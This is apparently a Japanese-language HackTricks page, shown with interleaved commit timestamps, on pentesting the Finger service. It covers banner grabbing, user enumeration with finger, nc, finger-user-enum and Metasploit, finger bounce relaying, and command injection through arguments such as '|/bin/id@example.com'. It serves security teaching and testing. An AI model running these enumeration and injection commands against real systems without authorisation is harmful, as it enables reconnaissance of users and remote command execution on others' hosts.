2024-01-05 23:40:55 +00:00
# 79 - Pentesting Finger
2022-04-28 16:01:33 +00:00
< details >
2024-01-05 23:40:55 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をご覧ください!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-05 23:40:55 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-05 23:40:55 +00:00
* **HackTricksにあなたの会社を広告したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローしてください。**
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有してください。
2022-04-28 16:01:33 +00:00
< / details >
2023-07-07 23:42:27 +00:00
## **基本情報**
2020-07-15 15:43:14 +00:00
2024-01-05 23:40:55 +00:00
**Finger**は、コンピュータユーザーに関する情報を見つけるために使用できるプログラムです。通常、ログイン名、フルネーム、およびfingeringしているユーザーに関する他の詳細をリストします。これらの詳細には、オフィスの場所や電話番号( 既知の場合) 、ログイン時間、アイドル時間、最後にメールを読んだ時間、ユーザーのプランとプロジェクトファイルが含まれる場合があります。
2020-07-15 15:43:14 +00:00
2024-01-05 23:40:55 +00:00
**デフォルトポート:** 79
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
PORT STATE SERVICE
79/tcp open finger
```
2023-07-07 23:42:27 +00:00
## **列挙**
2024-01-05 23:40:55 +00:00
### **バナー掴み取り/基本接続**
2020-07-15 15:43:14 +00:00
```bash
nc -vn < IP > 79
echo "root" | nc -vn < IP > 79
```
2024-01-05 23:40:55 +00:00
### **ユーザー列挙**
2020-07-15 15:43:14 +00:00
```bash
finger @< Victim > #List users
finger admin@< Victim > #Get info of user
finger user@< Victim > #Get info of user
```
2024-01-05 23:40:55 +00:00
代わりに、[**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) から **finger-user-enum** を使用することもできます。いくつかの例:
2020-11-17 13:01:39 +00:00
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
2024-01-05 23:40:55 +00:00
#### **Nmapはデフォルトスクリプトを使用してスクリプトを実行します**
2020-11-17 13:01:39 +00:00
2023-07-07 23:42:27 +00:00
### MetasploitはNmapよりも多くのトリックを使用します
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
use auxiliary/scanner/finger/finger_users
```
2022-05-08 23:13:03 +00:00
### Shodan
2020-07-15 15:43:14 +00:00
* `port:79 USER`
2024-01-05 23:40:55 +00:00
## コマンド実行
2020-07-15 15:43:14 +00:00
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
2022-05-08 23:13:03 +00:00
## Finger Bounce
2020-07-15 15:43:14 +00:00
2024-01-05 23:40:55 +00:00
[システムをfingerリレーとして使用する ](https://securiteam.com/exploits/2BUQ2RFQ0I/ )
2022-05-08 23:13:03 +00:00
```
2020-07-15 15:43:14 +00:00
finger user@host@victim
finger @internal@external
```
2022-04-28 16:01:33 +00:00
< details >
2024-01-05 23:40:55 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-05 23:40:55 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-05 23:40:55 +00:00
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローする**。
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
2022-04-28 16:01:33 +00:00
< / details >